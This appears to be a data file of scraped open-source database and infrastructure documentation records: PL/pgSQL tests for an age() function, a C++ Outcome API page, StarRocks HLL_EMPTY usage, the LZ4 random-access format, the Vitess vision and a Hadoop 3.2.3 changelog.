z := modeledagevs_age('0001-01-01 11:19:17', '0001-01-01 15:31:42 BC' ); return next; z := modeledagevs_age('0001-01-01 15:31:42 BC', '0001-01-01 11:19:17' ); return next; end; $body$; select z from manualtestreportformodeled_age(); ``` This is the result: ```output ttoday tdob age() - 2019-12-21 00:00:00 2019-12-21 00:00:00 00:00:00 2001-04-10 00:00:00 1957-06-13 00:00:00 43 years 9 mons 27 days 2001-04-10 11:19:17 1957-06-13 15:31:42 43 years 9 mons 26 days 19:47:35 0007-06-13 15:31:42.123456 BC 2001-04-10 11:19:17.654321 BC 1994 years 2 mons 3 days 04:12:24.469135 1957-06-13 15:31:42 2001-04-10 11:19:17 -43 years -9 mons -26 days -19:47:35 0001-01-01 11:19:17 0001-01-01 15:31:42 BC 11 mons 30 days 19:47:35 0001-01-01 15:31:42 BC 0001-01-01 11:19:17 -11 mons -30 days -19:47:35 ``` There is no fourth results columnin other words, the comparison of the result from the user-defined modeledagevsage(timestamp, timestamp) and the result from the built-in age()_ passes the test for each tested pair of inputs. Notice that the first two \"Positive ages\" tests use the same values as do the examples on this page's parent page in the section Because the implementation of modeledage(timestamp, timestamp) function was designed using intuition and iterative refinement in response to trial-and-error, it's critically important to test the comparison of the result from this and the result from the built-in age() function with a huge number of distinct input pairs. The only way to do this is to generate these pairs" }, { "data": "There is no available suitable random-number generator. But the function genrandombytes() comes to the rescue. This is not, strictly speaking, a built-in. Rather, it comes when you install the _ extension. {{< tip title=\"Always make the 'pgcrypto' extension centrally available in every database.\" >}} Not only does installing the extension bring the function genrandombytes(); also, it brings genrandomuuid(). This is commonly used to populate a surrogate primary key column. Yugabyte therefore recommends that you adopt the practice routinely to install pgcrypto (this must be done by a superuser) in a central \"utilities\" schema in every database that you create. By granting appropriate privileges and by including this schema in, for example, the second position in every regular user's search path, you can make genrandombytes(), genrandomuuid(), and all sorts of other useful utilities immediately available to all users with no further fuss. You might also like to install the extension as part of your standard set of central utilities. This does bring a random-number generator function, normalrand(). However, this generates a normally distributed set of double precision values. This functionality isn't appropriate for testing modeledage(); but it is appropriate for many other testing purposes. {{< /tip >}} First, you need a helper function to convert the bytea value that genrandombytes() returns to a number value. Create and test the helper thus: ```plpgsql drop function if exists byteatonum(bytea) cascade; create function byteatonum(b bytea) returns numeric language plpgsql as $body$ declare n numeric := 0; begin for j in 0..(length(b) - 1) loop n := n*256+get_byte(b, j); end loop; return n; end; $body$; ``` Now create the function randomtimestamp(). 
This invokes maketimestamp() with values from six successive invocations of genrandombytes(), using byteatonum() to convert the returned values first to numeric values and then to suitably constrained int values for each of the year, month, mday, hour, and min actual arguments and to a suitably constrained double precision value for the sec actual argument. Create it thus: ```plpgsql drop function if exists random_timestamp() cascade; create function random_timestamp() returns timestamp language plpgsql as $body$ declare year constant int not null := greatest(1::int, mod(byteatonum(genrandombytes(2))::int, 4700)); month constant int not null := greatest(1::int, mod(byteatonum(genrandombytes(2))::int, 12)); mday constant int not null := greatest(1::int, mod(byteatonum(genrandombytes(2))::int, 28)); hour constant int not null := mod(byteatonum(genrandombytes(2))::int, 23); min constant int not null := mod(byteatonum(genrandombytes(2))::int, 59); sec constant numeric not null := mod(byteatonum(genrandombytes(3)), 58.987654::numeric); ts constant timestamp not null := make_timestamp(year, month, mday, hour, min, sec::double precision); begin return case when (mod(byteatonum(genrandombytes(3))::int, 2) = 1) then ts else (ts::text||' BC')::timestamp end; end; $body$; ``` Test it like this: ```plpgsql select random_timestamp() as \"ts-1\", random_timestamp() as \"ts-2\"; ``` Repeat this select time and again. Each time, you'll see a pair of different values. Sometimes, they both have AD dates; sometimes they both have BC dates; sometimes one has an AD date and one has a BC date; sometimes \"ts-1\" is earlier than \"ts-2\"; and sometimes \"ts-2\" is earlier than \"ts-1\". The value 4700 was chosen to constrain the year because 4713 BC is the earliest legal timestamp value. (See the table in the subsection on the major sections' main page.) It's sufficient for the present testing purpose that the generated timestamp values are between 4700 BC and 4700 AD. This function invokes randomtimestamp() to generate two new distinct values and then uses these to invoke modeledage() and the built-in age(). It compares the values that they return using the `==` operator. Only if they differ, does it invoke modeledagevsage() to show the differing values. And if this happens, it notes that at least one difference has been" }, { "data": "The expectation is that there will be no differences to report so that the final report will show simply \"No failures\" and therefore be maximally easily understood. As a bonus, the report shows the minimum and the maximum generated values returned by randomtimestamp(). {{< note title=\"Notice how the special manifest constants '-infinity' and 'infinity' are used.\" >}} Notice how the '-infinity' and 'infinity' are used to set the starting values for, respectively, maxts and mints. Without this text-book pattern, the loop would need to be coded more elaborately by treating the first iteration as a special case that establishes maxts and mints as the values returned by the invocation of randomtimestamp() this time; only then could the second and subsequent iterations be coded using \"maxts := greatest(maxts, greatest(ts1, ts2));\" and \"mints := least(mints, least(ts1, ts2));\"_. 
{{< /note >}} Create the function thus: ```plpgsql drop function if exists randomtestreportformodeled_age(int) cascade; create function randomtestreportformodeledage(noof_attempts in int) returns table(z text) language plpgsql as $body$ declare no_failures boolean not null := true; max_ts timestamp not null := '-infinity'; min_ts timestamp not null := 'infinity'; begin for j in 1..noofattempts loop declare ts1 constant timestamp not null := random_timestamp(); ts2 constant timestamp not null := random_timestamp(); m constant interval not null := modeled_age(ts1, ts2); a constant interval not null := age(ts1, ts2); begin maxts := greatest(maxts, greatest(ts1, ts2)); mints := least(mints, least(ts1, ts2)); if m == a then null; else no_failures := false; z := modeledagevs_age(ts1, ts2); return next; end if; end; end loop; z := ''; return next; z := rpad('-', 120, '-'); return next; if no_failures then z := 'No failures.'; return next; end if; z := 'maxts: '||maxts::text||' | mints: '||mints::text; return next; end; $body$; ``` Test it first with a modest number of attempts: ```plpgsql select z from randomtestreportformodeled_age(1000); ``` Then increase the number of attempts to, say, one million. This takes about a minute. (No thought was given to make the test run faster. Its speed is uninteresting.) You'll see that \"No failures\" is reported and that the range of randomly generated timestamp values spans close to the maximum that randomtimestamp() can produce (4700 BC through 4700 AD). This should give you a very high confidence indeed that the function modeledage()_ lives up to its name. The effect of age(t) is identical to the effect of age(\\<midnight today\\>, t). Here's a demonstration of the semantics. The expression datetrunc('day', clocktimestamp()) is copied from the definition of today() in the subsection . 
Do this to test this assertion for the timestamptz overloads: ```plpgsql drop procedure if exists assert_one_parameter_overload_of_age_semantics(timestamptz) cascade; create procedure assert_one_parameter_overload_of_age_semantics(t in timestamptz) language plpgsql as $body$ declare age_1 constant interval not null := age(t); age_2 constant interval not null := age(date_trunc('day', clock_timestamp()), t); begin assert age_1 = age_2, 'Assert failed'; end; $body$; set timezone = 'UTC'; call assert_one_parameter_overload_of_age_semantics('2007-06-24'); call assert_one_parameter_overload_of_age_semantics('2051-07-19 Europe/Helsinki'); call assert_one_parameter_overload_of_age_semantics('2007-02-01 13:42:19.12345'); call assert_one_parameter_overload_of_age_semantics(clock_timestamp()); set timezone = 'America/Los_Angeles'; call assert_one_parameter_overload_of_age_semantics('2007-06-24'); call assert_one_parameter_overload_of_age_semantics('2051-07-19 Europe/Helsinki'); call assert_one_parameter_overload_of_age_semantics('2007-02-01 13:42:19.12345'); call assert_one_parameter_overload_of_age_semantics(clock_timestamp()); ``` Each call statement finishes without error, showing that the assertion holds for every test. Do this to test this assertion for the plain timestamp overloads: ```plpgsql drop procedure if exists assert_one_parameter_overload_of_age_semantics(timestamp) cascade; create procedure assert_one_parameter_overload_of_age_semantics(t in timestamp) language plpgsql as $body$ declare age_1 constant interval not null := age(t); age_2 constant interval not null := age(date_trunc('day', localtimestamp), t); begin assert age_1 = age_2, 'Assert failed'; end; $body$; set timezone = 'UTC'; call assert_one_parameter_overload_of_age_semantics('2007-02-01 13:42:19.12345'); call assert_one_parameter_overload_of_age_semantics('2007-06-24'); call assert_one_parameter_overload_of_age_semantics('2051-07-19'); call assert_one_parameter_overload_of_age_semantics(clock_timestamp()); set timezone = 'America/Los_Angeles'; call assert_one_parameter_overload_of_age_semantics('2007-02-01 13:42:19.12345'); call assert_one_parameter_overload_of_age_semantics('2007-06-24'); call assert_one_parameter_overload_of_age_semantics('2051-07-19'); call assert_one_parameter_overload_of_age_semantics(clock_timestamp()); ``` Each call statement finishes without error, showing that the assertion holds for every test." } ]
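As an aside, if you want to follow along without installing the downloadable code kit, the user-defined "strict equals" operator relied on throughout these tests can be sketched as follows. This is only an illustrative assumption about one way to implement it (the kit's actual code may differ): it compares the months, days, and seconds fields of the two interval values separately, rather than letting the native "=" operator normalize them first.

```plpgsql
-- Illustrative sketch only; not the downloadable kit's implementation.
drop function if exists strict_interval_equals(interval, interval) cascade;

create function strict_interval_equals(i1 in interval, i2 in interval)
  returns boolean
  language sql
as $body$
  select
    (
      extract(year  from i1)*12   + extract(month  from i1),
      extract(day   from i1),
      extract(hour  from i1)*3600 + extract(minute from i1)*60 + extract(second from i1)
    )
    =
    (
      extract(year  from i2)*12   + extract(month  from i2),
      extract(day   from i2),
      extract(hour  from i2)*3600 + extract(minute from i2)*60 + extract(second from i2)
    );
$body$;

-- Expose the function as the "==" operator used by the comparison function and test harness.
create operator == (
  leftarg  = interval,
  rightarg = interval,
  function = strict_interval_equals);
```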
{ "category": "App Definition and Development", "file_name": "value.md", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "+++ title = \"`static auto &&_value(Impl &&) noexcept`\" description = \"Returns a reference to the value in the implementation passed in. Constexpr, never throws.\" categories = [\"observers\"] weight = 250 +++ Returns a reference to the value in the implementation passed in. No checking is done to ensure there is a value. Constexpr where possible. Requires: Always available. Complexity: Constant time. Guarantees: Never throws an exception." } ]
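To make the contract above concrete, here is a small self-contained C++ sketch of the general shape of such an unchecked observer. It is illustrative only, not Outcome's actual source; the `_value` member on the stand-in implementation type is an assumption made purely for the example.

```cpp
#include <utility>

// Stand-in for the real implementation type; the "_value" member name is assumed
// only for this sketch.
struct impl_with_value
{
  int _value;
};

// General shape of the observer described above: perfect-forward the implementation
// object and return a reference to its stored value. No check is made that a value
// is actually present, so the call is constant time and never throws.
template <class Impl>
constexpr auto &&unchecked_value(Impl &&self) noexcept
{
  return std::forward<Impl>(self)._value;
}

int main()
{
  impl_with_value x{42};
  return (unchecked_value(x) == 42) ? 0 : 1;
}
```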
{ "category": "App Definition and Development", "file_name": "hll_empty.md", "project_name": "StarRocks", "subcategory": "Database" }
[ { "data": "displayed_sidebar: \"English\" Generates an empty HLL column to supplement the default values when inserting or loading data. ```Haskell HLL_EMPTY() ``` Returns an empty HLL. Supplement the default values when inserting data. ```plain text insert into hllDemo(k1,v1) values(10,hll_empty()); ``` Supplement the default values when loading data. ```plain text curl --location-trusted -u <username>:<password> \\ -H \"columns: temp1, temp2, col1=hll_hash(temp1), col2=hll_empty()\" \\ -T example7.csv -XPUT \\ http://<fe_host>:<fe_http_port>/api/test_db/table7/_stream_load ```" } ]
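For context, once rows have been inserted or loaded this way, the HLL column is normally consumed with the HLL aggregate functions. The following is just an illustrative query against the `hllDemo` table used above (function availability may vary slightly across StarRocks versions):

```sql
-- Approximate number of distinct values accumulated in the HLL column.
SELECT HLL_CARDINALITY(HLL_UNION_AGG(v1)) AS approx_distinct
FROM hllDemo;
```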
{ "category": "App Definition and Development", "file_name": "dictionaryRandomAccess.md", "project_name": "ArangoDB", "subcategory": "Database" }
[ { "data": "`dictionaryRandomAccess.c` is LZ4 API example which implements dictionary compression and random access decompression. Please note that the output file is not compatible with lz4frame and is platform dependent. Dictionary based compression for homogenous files. Random access to compressed blocks. Reads the dictionary from a file, and uses it as the history for each block. This allows each block to be independent, but maintains compression ratio. ``` Dictionary | v ++ | Block#1 | +-+-+ | v {Out#1} Dictionary | v ++ | Block#2 | +-+-+ | v {Out#2} ``` After writing the magic bytes `TEST` and then the compressed blocks, write out the jump table. The last 4 bytes is an integer containing the number of blocks in the stream. If there are `N` blocks, then just before the last 4 bytes is `N + 1` 4 byte integers containing the offsets at the beginning and end of each block. Let `Offset#K` be the total number of bytes written after writing out `Block#K` including the magic bytes for simplicity. ``` +++ +++-+ +-+--+ | TEST | Block#1 | ... | Block#N | 4 | Offset#1 | ... | Offset#N | N+1 | +++ +++-+ +-+--+ ``` Decompression will do reverse order. Seek to the last 4 bytes of the file and read the number of offsets. Read each offset into an array. Seek to the first block containing data we want to read. We know where to look because we know each block contains a fixed amount of uncompressed data, except possibly the last. Decompress it and write what data we need from it to the file. Read the next block. Decompress it and write that page to the file. Continue these procedure until all the required data has been read." } ]
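To make the layout described above concrete, the following C sketch shows how a reader could recover the jump table before seeking to a block. It is illustrative only (not the actual `dictionaryRandomAccess.c` code), and endianness handling plus most error checking are omitted for brevity:

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>

/* Illustrative sketch: the file ends with (N + 1) 4-byte offsets followed by a
 * 4-byte block count N, as described above. Offsets are counted from the start
 * of the file, magic bytes included. */
static uint32_t *read_jump_table(FILE *f, uint32_t *num_blocks_out)
{
    uint32_t num_blocks = 0;

    /* The last 4 bytes hold the number of blocks. */
    fseek(f, -4L, SEEK_END);
    if (fread(&num_blocks, sizeof num_blocks, 1, f) != 1) return NULL;

    /* Just before it sit num_blocks + 1 offsets (begin/end of every block). */
    uint32_t *offsets = malloc((num_blocks + 1) * sizeof *offsets);
    if (offsets == NULL) return NULL;

    fseek(f, -(long)(4u * (num_blocks + 2)), SEEK_END);
    if (fread(offsets, sizeof *offsets, num_blocks + 1, f) != num_blocks + 1) {
        free(offsets);
        return NULL;
    }

    *num_blocks_out = num_blocks;
    return offsets;   /* Block #K spans bytes [offsets[K-1], offsets[K]). Caller frees. */
}
```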
{ "category": "App Definition and Development", "file_name": "Vision.md", "project_name": "Vitess", "subcategory": "Database" }
[ { "data": "MySQL is an easy relational database to get started with. It's easy to setup and has a short learning curve. However, as your system starts to scale, it begins to run out of steam. This is mainly because it's non-trivial to shard a MySQL database after the fact. Among other problems, the growing number of connections also becomes an unbearable overhead. On the other end of the spectrum, there are NoSQL databases. However, they suffer from problems that mainly stem from the fact that they're new. Those who have adopted them have struggled with the lack of secondary indexes, table joins and transactions. Vitess tries to bring the best of both worlds by trading off some of MySQL's consistency features in order to achieve the kind of scalability that NoSQL databases provide. Scalability*: This is achieved by replication and sharding. Efficiency*: This is achieved by a proxy server (vttablet) that multiplexes queries into a fixed-size connection pool, and rewrites updates by primary key to speed up slave applier threads. Manageability*: As soon as you add replication and sharding that span across multiple data centers, the number of servers spirals out of control. Vitess provides a set of tools backed by a lockserver (zookeeper) to track and administer them. Simplicity*: As the complexity grows, it's important to hide this from the application. The vtgate servers give you a unified view of the fleet that makes it feel like you're just interacting with one database. Scalability and availability require some trade-offs: Consistency*: In a typical web application, not all reads have to be fully consistent. Vitess lets you specify the kind of consistency you want on your read. It's generally recommended that you use replica reads as they're easier to scale. You can always request for primary reads if you want up-to-date data. You can also additionally perform 'for update' reads that ensure that a row will not change until you've committed your changes. Transactions*: Relational transactions are prohibitively expensive across distributed systems. Vitess eases this constraint and guarantees transactional integrity 'per keyspace id', which is restricted to one shard. Heuristically, this tends to cover most of an application's transactions. For the few cases that don't, you can sequence your changes in such a way that the system looks consistent even if a distributed transaction fails in the middle. Latency*: There is some negligible latency introduced by the proxy servers. However, they make up for the fact that you can extract more throughput from MySQL than you would otherwise be able to without them. Since the underlying storage layer is still MySQL, we still get to preserve its other important features: Indexes*: You can create secondary indexes on your tables. This allows you to efficiently query rows using more than one key. Joins*: MySQL allows you to split one-to-many and many-to-many relational data into separate tables, and lets you join them on demand. This flexibility generally results in more efficient storage as each piece of data is stored only once, and fetched only if needed. The following diagram illustrates where vitess fits in the spectrum of storage solutions:" } ]
{ "category": "App Definition and Development", "file_name": "CHANGELOG.3.2.3.md", "project_name": "Apache Hadoop", "subcategory": "Database" }
[ { "data": "<! --> | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | Add PathCapabilities to FS and FC to complement StreamCapabilities | Major | . | Steve Loughran | Steve Loughran | | | Add Metrics to HttpFS Server | Major | httpfs | Ahmed Hussein | Ahmed Hussein | | | EC: Verify EC reconstruction correctness on DataNode | Major | datanode, ec, erasure-coding | Toshihiko Uchida | Toshihiko Uchida | | | Show start time of Datanode on Web | Minor | . | tomscut | tomscut | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | Remove Subversion and Forrest from Dockerfile | Minor | build | Akira Ajisaka | Xieming Li | | | Remove low-level zookeeper test to be able to build Hadoop against zookeeper 3.5.5 | Major | test | Mate Szalay-Beko | Mate Szalay-Beko | | | Remove GenericsUtil isLog4jLogger dependency on Log4jLoggerAdapter | Major | . | David Mollitor | Xieming Li | | | Install yarnpkg and upgrade nodejs in Dockerfile | Major | buid, yarn-ui-v2 | Akira Ajisaka | Akira Ajisaka | | | Use JUnit TemporaryFolder Rule in TestFileUtils | Minor | common, test | David Mollitor | David Mollitor | | | Remove process command timing from BPServiceActor | Major | . | igo Goiri | Xiaoqiao He | | | Update Dockerfile to use Bionic | Major | build, test | Akira Ajisaka | Akira Ajisaka | | | Remove unnecessary sort of block list in DirectoryScanner | Major | . | Stephen O'Donnell | Stephen O'Donnell | | | Backport DirectoryScanner improvements HDFS-14476, HDFS-14751 and HDFS-15048 to branch 3.2 and 3.1 | Major | datanode | Stephen O'Donnell | Stephen O'Donnell | | | [SBN Read] HDFS should expose msync() API to allow downstream applications call it explicitly. | Major | ha, hdfs-client | Konstantin Shvachko | Konstantin Shvachko | | | Avoid redundant RPC calls for getDiskStatus | Major | dfsclient | Ayush Saxena | Ayush Saxena | | | Add cpu and memory utilization per node and cluster-wide metrics | Minor | yarn | Jim Brennan | Jim Brennan | | | Make block size from NNThroughputBenchmark configurable | Minor | benchmarks | Hui Fei | Hui Fei | | | Scale RM-NM heartbeat interval based on node utilization | Minor | yarn | Jim Brennan | Jim Brennan | | | Balancer logging improvement | Major | balancer & mover | Konstantin Shvachko | Konstantin Shvachko | | | Creating a token identifier should not do kerberos name resolution | Major | common | Jim Brennan | Jim Brennan | | | RMProxy should retry on SocketTimeout Exceptions | Major | yarn | Jim Brennan | Jim Brennan | | | Respect configured values of rpc.engine | Major | hdfs | Hector Sandoval Chaverri | Hector Sandoval Chaverri | | | Remove WARN Logging From Interrupts in DataStreamer | Minor | hdfs-client | David Mollitor | David Mollitor | | | Add InetAddress api to ProxyUsers.authorize | Major | performance, security | Ahmed Hussein | Ahmed Hussein | | | Avoid calling UpdateHeartBeatState inside DataNodeDescriptor | Major |" }, { "data": "| Ahmed Hussein | Ahmed Hussein | | | Don't generate edits for set operations that are no-op | Major | namenode | Ahmed Hussein | Ahmed Hussein | | | Remote exception messages should not include the exception class | Major | ipc | Ahmed Hussein | Ahmed Hussein | | | HttpFS: Log more information on request failures | Major | httpfs | Ahmed Hussein | Ahmed Hussein | | | KMS should log full UGI principal | Major | . 
| Ahmed Hussein | Ahmed Hussein | | | namenode audit async logger should add some log4j config | Minor | hdfs | Max Xie | | | | Mitigate lease monitor's rapid infinite loop | Major | namenode | Ahmed Hussein | Ahmed Hussein | | | Add documentation for msync() API to filesystem.md | Major | documentation | Konstantin Shvachko | Konstantin Shvachko | | | Add recommissioning nodes to the list of updated nodes returned to the AM | Major | . | Srinivas S T | Srinivas S T | | | Diagnostics for localization timeouts is lacking | Major | . | Chang Li | Chang Li | | | Follow up changes for YARN-9833 | Major | yarn | Jim Brennan | Jim Brennan | | | Speed up BlockPlacementPolicyRackFaultTolerant#verifyBlockPlacement | Major | block placement | Akira Ajisaka | Akira Ajisaka | | | Improve the description of hadoop.http.authentication.signature.secret.file | Minor | documentation | Akira Ajisaka | Akira Ajisaka | | | Lease renewal does not require namesystem lock | Major | hdfs | Jim Brennan | Jim Brennan | | | Fix logging typo in ShutdownHookManager | Major | common | Konstantin Shvachko | Fengnan Li | | | Move Jenkinsfile outside of the root directory | Major | build | Akira Ajisaka | Akira Ajisaka | | | Make DisallowedDatanodeException terse | Minor | hdfs | Richard | Richard | | | DataStreamer: keep sending heartbeat packets while streaming | Major | hdfs | Jim Brennan | Jim Brennan | | | Log list of mappers at trace level in ShuffleHandler audit log | Minor | yarn | Jim Brennan | Jim Brennan | | | Add metrics for in-service datanodes | Minor | . | Zehao Chen | Zehao Chen | | | Log resource allocation in NM log at container start time | Major | . | Eric Badger | Eric Badger | | | if required storageType are unavailable, log the failed reason during choosing Datanode | Minor | block placement | Yang Yun | Yang Yun | | | Solve the problem of incorrect progress of delegation tokens when loading FsImage | Major | . | JiangHua Zhu | JiangHua Zhu | | | [READ] DirectoryScanner#scan need not check StorageType.PROVIDED | Minor | datanode | Yuxuan Wang | Yuxuan Wang | | | Add kms-default.xml and httpfs-default.xml to site index | Minor | documentation | Masatake Iwasaki | Masatake Iwasaki | | | Config to allow Intra- and Inter-queue preemption to enable/disable conservativeDRF | Minor | capacity scheduler, scheduler preemption | Eric Payne | Eric Payne | | | Fixed the findbugs issues introduced by YARN-10647. | Major | . | Qi Zhu | Qi Zhu | | | ClientHSSecurityInfo class is in wrong META-INF file | Major | . | Eric Badger | Eric Badger | | | Update Description of hadoop-http-auth-signature-secret in HttpAuthentication.md | Minor |" }, { "data": "| Ravuri Sushma sree | Ravuri Sushma sree | | | Allow parameter expansion in NM\\ADMIN\\USER\\_ENV | Major | yarn | Jim Brennan | Jim Brennan | | | Apply YETUS-1102 to re-enable GitHub comments | Major | build | Akira Ajisaka | Akira Ajisaka | | | DistCp: Expose the JobId for applications executing through run method | Major | . | Ayush Saxena | Ayush Saxena | | | Provide blocks moved count in Balancer iteration result | Major | balancer & mover | Viraj Jasani | Viraj Jasani | | | BlockPoolManager should log stack trace if unable to get Namenode addresses | Major | datanode | Stephen O'Donnell | Stephen O'Donnell | | | Use spotbugs-maven-plugin instead of findbugs-maven-plugin | Major | build | Akira Ajisaka | Akira Ajisaka | | | Improve the balancer error message when process exits abnormally. | Major | . 
| Renukaprasad C | Renukaprasad C | | | Fix non-static inner classes for better memory management | Major | . | Viraj Jasani | Viraj Jasani | | | Increase Quota initialization threads | Major | namenode | Stephen O'Donnell | Stephen O'Donnell | | | Reduce memory used during datanode layout upgrade | Major | datanode | Stephen O'Donnell | Stephen O'Donnell | | | Building native code fails on Fedora 33 | Major | build, common | Kengo Seki | Masatake Iwasaki | | | Bump json-smart to 2.4.2 and nimbus-jose-jwt to 9.8 due to CVEs | Major | auth, build | helen huang | Viraj Jasani | | | Provide source artifacts for hadoop-client-api | Major | . | Karel Kolman | Karel Kolman | | | Allow ProtobufRpcEngine to be extensible | Major | common | Hector Sandoval Chaverri | Hector Sandoval Chaverri | | | Error message around yarn app -stop/start can be improved to highlight that an implementation at framework level is needed for the stop/start functionality to work | Minor | client, documentation | Siddharth Ahuja | Siddharth Ahuja | | | Increase precommit job timeout from 20 hours to 24 hours. | Major | build | Takanobu Asanuma | Takanobu Asanuma | | | Remove redundant RPC requests for getFileLinkInfo in ClientNamenodeProtocolTranslatorPB | Minor | . | lei w | lei w | | | Remove an expensive debug string concatenation | Major | . | Wei-Chiu Chuang | Wei-Chiu Chuang | | | Introduce read write lock to Datanode | Major | datanode | Stephen O'Donnell | Stephen O'Donnell | | | Intra-queue preemption: apps that don't use defined custom resource won't be preempted. | Major | . | Eric Payne | Eric Payne | | | Remove lock contention in SelectorPool of SocketIOWithTimeout | Major | common | Xuesen Liang | Xuesen Liang | | | Remove JavaScript package from Docker environment | Major | build | Masatake Iwasaki | Masatake Iwasaki | | | Add a sample configuration to use ZKDelegationTokenSecretManager in Hadoop KMS | Major | documentation, kms, security | Akira Ajisaka | Akira Ajisaka | | | Document" }, { "data": "| Major | documentation | Arpit Agarwal | Akira Ajisaka | | | RM PartitionQueueMetrics records are named QueueMetrics in Simon metrics registry | Major | resourcemanager | Eric Payne | Eric Payne | | | Make the socket timeout for computing checksum of striped blocks configurable | Minor | datanode, ec, erasure-coding | Yushi Hayasaka | Yushi Hayasaka | | | [UI2] YARN-10826 breaks Queue view | Major | yarn-ui-v2 | Andras Gyori | Masatake Iwasaki | | | Make max container per heartbeat configs refreshable | Major | . | Eric Badger | Eric Badger | | | Checkstyle - Allow line length: 100 | Major | . | Akira Ajisaka | Viraj Jasani | | | Add extensions to ProtobufRpcEngine RequestHeaderProto | Major | common | Hector Sandoval Chaverri | Hector Sandoval Chaverri | | | Avoid evaluation of LOG.debug statement in QuorumJournalManager | Trivial | . | wangzhaohui | wangzhaohui | | | TestMiniJournalCluster failing intermittently because of not reseting UserGroupInformation completely | Minor | . | wangzhaohui | wangzhaohui | | | Exclude spotbugs-annotations from transitive dependencies on branch-3.2 | Major | . 
| Masatake Iwasaki | Masatake Iwasaki | | | Improve CopyCommands#Put#executor queue configurability | Major | fs | JiangHua Zhu | JiangHua Zhu | | | ReplicaMap, Disk Balancer, Directory Scanner and various FsDatasetImpl methods should use datanode readlock | Major | datanode | Stephen O'Donnell | Stephen O'Donnell | | | BPServiceActor processes commands from NameNode asynchronously | Major | datanode | Xiaoqiao He | Xiaoqiao He | | | Standby close reconstruction thread | Major | . | zhanghuazong | zhanghuazong | | | Debug tool to verify the correctness of erasure coding on file | Minor | erasure-coding, tools | daimin | daimin | | | Allow get command to run with multi threads. | Major | fs | Chengwei Wang | Chengwei Wang | | | Allow cp command to run with multi threads. | Major | fs | Chengwei Wang | Chengwei Wang | | | WASB : Make metadata checks case insensitive | Major | . | Anoop Sam John | Anoop Sam John | | | Reduce DataNode load when FsDatasetAsyncDiskService is working | Major | datanode | JiangHua Zhu | JiangHua Zhu | | | Validate maximum blocks in EC group when adding an EC policy | Minor | ec, erasure-coding | daimin | daimin | | | Improve FUSE IO performance by supporting FUSE parameter max\\_background | Minor | fuse-dfs | daimin | daimin | | | Better exception handling for testFileStatusOnMountLink() in ViewFsBaseTest.java | Trivial | . | Xing Lin | Xing Lin | | | Refactor tests in TestFileUtil | Trivial | common | Gautham Banasandra | Gautham Banasandra | | JIRA | Summary | Priority | Component | Reporter | Contributor | |:- |:- | : |:- |:- |:- | | | Filter overlapping objenesis class in hadoop-client-minicluster | Minor | build | Xiaoyu Yao | Xiaoyu Yao | | | Bump up Atsv2 hbase versions | Major | . | Rohith Sharma K S | Vrushali C | | | Fix intermittent failure of TestNameNodeMetrics | Major | . | Ayush Saxena | Ayush Saxena | | | NPE when executing a command yarn node -status or -states without additional arguments | Minor | client | Masahiro Tanaka | Masahiro Tanaka | | | Timeline Server event handler threads locked | Major | ATSv2, timelineserver | Venkata Puneet Ravuri | Prabhu Joseph | | | Testcase fails with \"Insufficient configured threads: required=16 \\< max=10\" | Major | . | Prabhu Joseph | Prabhu Joseph | | | Fix build instruction of hadoop-yarn-ui | Minor | yarn-ui-v2 | Masatake Iwasaki | Masatake Iwasaki | | | Upgrade build tools for YARN Web UI v2 | Major | build, security, yarn-ui-v2 | Akira Ajisaka | Masatake Iwasaki | | | CORRUPT replica mismatch between namenodes after failover | Critical |" }, { "data": "| Ayush Saxena | Ayush Saxena | | | Delete Corrupt Replica Immediately Irrespective of Replicas On Stale Storage | Critical | . | Ayush Saxena | Ayush Saxena | | | Missing IBR when NameNode restart if open processCommand async feature | Blocker | datanode | Xiaoqiao He | Xiaoqiao He | | | EC : File write hanged when DN is shutdown by admin command. | Major | ec | Surendra Singh Lilhore | Surendra Singh Lilhore | | | SnappyCompressor test cases wrongly assume that the compressed data is always smaller than the input data | Major | io, test | zhao bo | Akira Ajisaka | | | Unable to unregister FsDatasetState MBean if DataNode is shutdown twice | Trivial | datanode | Wei-Chiu Chuang | Wei-Chiu Chuang | | | client fails forever when namenode ipaddr changed | Major | hdfs-client | Sean Chow | Sean Chow | | | TestReconstructStripedFile#testErasureCodingWorkerXmitsWeight is failing on trunk | Major | . 
| Hemanth Boyina | Hemanth Boyina | | | Upgrade node.js to 10.21.0 | Critical | build, yarn-ui-v2 | Akira Ajisaka | Akira Ajisaka | | | Jetty upgrade to 9.4.x causes MR app fail with IOException | Major | . | Bilwa S T | Bilwa S T | | | Fix spotbugs warnings surfaced after upgrade to 4.0.6 | Minor | . | Masatake Iwasaki | Masatake Iwasaki | | | Setting dfs.mover.retry.max.attempts to negative value will retry forever. | Major | balancer & mover | AMC-team | AMC-team | | | Log improvements in NodeStatusUpdaterImpl | Minor | nodemanager | Bilwa S T | Bilwa S T | | | Setting dfs.disk.balancer.max.disk.errors = 0 will fail the block copy | Major | balancer & mover | AMC-team | AMC-team | | | Handle null containerId in ClientRMService#getContainerReport() | Major | resourcemanager | Raghvendra Singh | Shubham Gupta | | | HttpFS server throws NPE if a file is a symlink | Major | fs, httpfs | Ahmed Hussein | Ahmed Hussein | | | Audit log deletes before collecting blocks | Major | logging, namenode | Ahmed Hussein | Ahmed Hussein | | | Javadoc warnings and errors are ignored in the precommit jobs | Major | build, documentation | Akira Ajisaka | Akira Ajisaka | | | Touch command with -c option is broken | Major | . | Ayush Saxena | Ayush Saxena | | | [JDK 11] Fix Javadoc errors in hadoop-hdfs-client | Major | . | Takanobu Asanuma | Takanobu Asanuma | | | Deleted blocks linger in the replications queue | Major | hdfs | Ahmed Hussein | Ahmed Hussein | | | DataNode could meet deadlock if invoke refreshNameNode | Critical | . | Hongbing Wang | Hongbing Wang | | | Upgrading to JUnit 4.13 causes testcase TestFetcher.testCorruptedIFile() to fail | Major | test | Peter Bacsko | Peter Bacsko | | | Failed volumes can cause DNs to stop block reporting | Major | block placement, datanode | Ahmed Hussein | Ahmed Hussein | | | Bump up snakeyaml to 1.26 to mitigate CVE-2017-18640 | Major | . | Brahma Reddy Battula | Brahma Reddy Battula | | | ContainerIdPBImpl objects can be leaked in RMNodeImpl.completedContainers | Major | resourcemanager | Haibo Chen | Haibo Chen | | | mvn site commands fails due to MetricsSystemImpl changes | Major |" }, { "data": "| Xiaoqiao He | Xiaoqiao He | | | Client could not obtain block when DN CommandProcessingThread exit | Major | . | Yiqun Lin | Mingxiang Li | | 